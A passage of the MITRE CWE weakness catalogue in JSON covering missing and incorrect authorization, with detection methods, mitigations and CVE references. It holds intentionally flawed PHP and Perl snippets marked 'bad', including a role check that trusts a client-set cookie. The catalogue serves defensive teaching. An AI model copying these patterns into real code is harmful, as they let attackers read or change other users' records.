technique that detects the absence of authorization may report false positives."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic."},{"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms."]},"Effectiveness":"Moderate","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.","Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role."]}},{"Phase":"Architecture and Design","Description":"Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient\'s doctor [REF-7]."},{"attr":{"@_Mitigation_ID":"MIT-4.4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.","One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page."]}},{"Phase":["System Configuration","Installation"],"Description":"Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \\"default deny\\" policy when defining these ACLs."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-95"},"Intro_Text":"This function runs an arbitrary SQL query on a given database, returning the result of the query.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function runEmployeeQuery($dbName, $name){}$employeeRecord = runEmployeeQuery(\'EmployeeDB\',$_GET[\'EmployeeName\']);","xhtml:div":{"#text":"mysql_select_db($dbName,$globalDbHandle) or die(\\"Could not open Database\\".$dbName);$preparedStatement = $globalDbHandle-&gt;prepare(\'SELECT * FROM employees WHERE name = :name\');$preparedStatement-&gt;execute(array(\':name\' =&gt; $name));return $preparedStatement-&gt;fetchAll();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:i":"//Use a prepared statement to avoid CWE-89"},"xhtml:br":["","",""],"xhtml:i":"/.../"}},"Body_Text":"While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-96"},"Intro_Text":"The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub DisplayPrivateMessage {}my $q = new CGI;if (! AuthenticateUser($q-&gt;param(\'username\'), $q-&gt;param(\'password\'))) {}my $id = $q-&gt;param(\'id\');DisplayPrivateMessage($id);","xhtml:div":[{"#text":"my($id) = @_;my $Message = LookupMessageObject($id);print \\"From: \\" . encodeHTML($Message-&gt;{from}) . \\"&lt;br&gt;\\\\n\\";print \\"Subject: \\" . encodeHTML($Message-&gt;{subject}) . \\"\\\\n\\";print \\"&lt;hr&gt;\\\\n\\";print \\"Body: \\" . encodeHTML($Message-&gt;{body}) . \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"ExitError(\\"invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","","","","","",""],"xhtml:i":["# For purposes of this example, assume that CWE-309 and","# CWE-523 do not apply."]}},"Body_Text":["While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.","One way to avoid this problem would be to ensure that the \\"to\\" field in the message object matches the username of the authenticated user."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3168","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3168"},{"Reference":"CVE-2009-3597","Description":"Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3597"},{"Reference":"CVE-2009-2282","Description":"Terminal server does not check authorization for guest access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2282"},{"Reference":"CVE-2008-5027","Description":"System monitoring software allows users to bypass authorization by creating custom forms.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5027"},{"Reference":"CVE-2009-3781","Description":"Content management system does not check access permissions for private files, allowing others to view those files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3781"},{"Reference":"CVE-2008-6548","Description":"Product does not check the ACL of a page accessed using an \\"include\\" directive, allowing attackers to read unauthorized files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6548"},{"Reference":"CVE-2009-2960","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2960"},{"Reference":"CVE-2009-3230","Description":"Database server does not use appropriate privileges for certain sensitive operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3230"},{"Reference":"CVE-2009-2213","Description":"Gateway uses default \\"Allow\\" configuration for its authorization settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-0034","Description":"Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034"},{"Reference":"CVE-2008-6123","Description":"Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123"},{"Reference":"CVE-2008-7109","Description":"Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109"},{"Reference":"CVE-2008-3424","Description":"Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"},{"Reference":"CVE-2008-4577","Description":"ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577"},{"Reference":"CVE-2007-2925","Description":"Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2925"},{"Reference":"CVE-2006-6679","Description":"Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679"},{"Reference":"CVE-2005-3623","Description":"OS kernel does not check for a certain privilege before setting ACLs for files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3623"},{"Reference":"CVE-2005-2801","Description":"Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"},{"Reference":"CVE-2020-17533","Description":"Chain: unchecked return value (CWE-252) of some functions for policy enforcement leads to authorization bypass (CWE-862)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17533"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"665"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-229"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, &#34;Authorization&#34; Page 114; Chapter 6, &#34;Determining&#xA;                  Appropriate Access Control&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-231"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-233"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Authorization&#34;, Page 39"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-05-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"}]}},"863":{"attr":{"@_ID":"863","@_Name":"Incorrect Authorization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions.","Extended_Description":{"xhtml:p":["Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user\'s privileges and any permissions or other access-control specifications that apply to the resource.","When access control checks are incorrectly applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \\"No access\\", \\"Read access\\", \\"Change access\\", and \\"Full control\\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."},"Alternate_Terms":{"Alternate_Term":{"Term":"AuthZ","Description":"\\"AuthZ\\" is typically used as an abbreviation of \\"authorization\\" within the web application security community. It is distinct from \\"AuthN\\" (or, sometimes, \\"AuthC\\") which is an abbreviation of \\"authentication.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Authorization weaknesses may arise when a single-user application is ported to a multi-user environment."},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies."]}},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker could read sensitive data, either by reading the data directly from a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to read the data."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"An attacker could modify sensitive data, either by writing the data directly to a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to write the data."},{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"An attacker could gain privileges by modifying or reading critical data directly, or by accessing privileged functionality."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.","Generally, automated static analysis tools have difficulty detecting custom authorization schemes. Even if they can be customized to recognize these schemes, they might not be able to tell whether the scheme correctly performs the authorization in a way that cannot be bypassed or subverted by an attacker."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Automated dynamic analysis may not be able to find interfaces that are protected by authorization checks, even if those checks contain weaknesses."},{"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms."]},"Effectiveness":"Moderate","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer","Forced Path Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.","Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role."]}},{"Phase":"Architecture and Design","Description":"Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient\'s doctor [REF-7]."},{"attr":{"@_Mitigation_ID":"MIT-4.4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.","One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page."]}},{"Phase":["System Configuration","Installation"],"Description":"Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \\"default deny\\" policy when defining these ACLs."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code could be for a medical records application. It displays a record to already authenticated users, confirming the user\'s authorization using a value stored in a cookie.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$role = $_COOKIES[\'role\'];if (!$role) {}if ($role == \'Reader\') {}else{}","xhtml:br":["","",""],"xhtml:div":[{"#text":"$role = getRole(\'user\');if ($role) {}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":[{"#text":"// save the cookie to send out in future responsessetcookie(\\"role\\", $role, time()+60*60*2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"ShowLoginScreen();die(\\"\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]},{"#text":"DisplayMedicalHistory($_POST[\'patient_ID\']);","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"You are not Authorized to view this record\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"The programmer expects that the cookie will only be set when getRole() succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. However, the attacker can easily set the \\"role\\" cookie to the value \\"Reader\\". As a result, the $role variable is \\"Reader\\", and getRole() is never invoked. The attacker has bypassed the authorization system."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-15900","Description":"Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900"},{"Reference":"CVE-2009-2213","Description":"Gateway uses default \\"Allow\\" configuration for its authorization settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-0034","Description":"Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034"},{"Reference":"CVE-2008-6123","Description":"Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123"},{"Reference":"CVE-2008-7109","Description":"Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109"},{"Reference":"CVE-2008-3424","Description":"Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424"},{"Reference":"CVE-2008-4577","Description":"ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577"},{"Reference":"CVE-2006-6679","Description":"Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679"},{"Reference":"CVE-2005-2801","Description":"Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-229"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, &#34;Authorization&#34; Page 114; Chapter 6, &#34;Determining&#xA;                  Appropriate Access Control&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-231"}},{"attr":{"@_External_Reference_ID":"REF-233"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Authorization&#34;, Page 39"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-05-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"908":{"attr":{"@_ID":"908","@_Name":"Use of Uninitialized Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses or accesses a resource that has not been initialized.","Extended_Description":"When a resource has not been properly initialized, the software may behave unexpectedly. This may lead to a crash or invalid memory access, but the consequences vary depending on the type of resource and how it is used within the software.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"],"Note":"When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The uninitialized 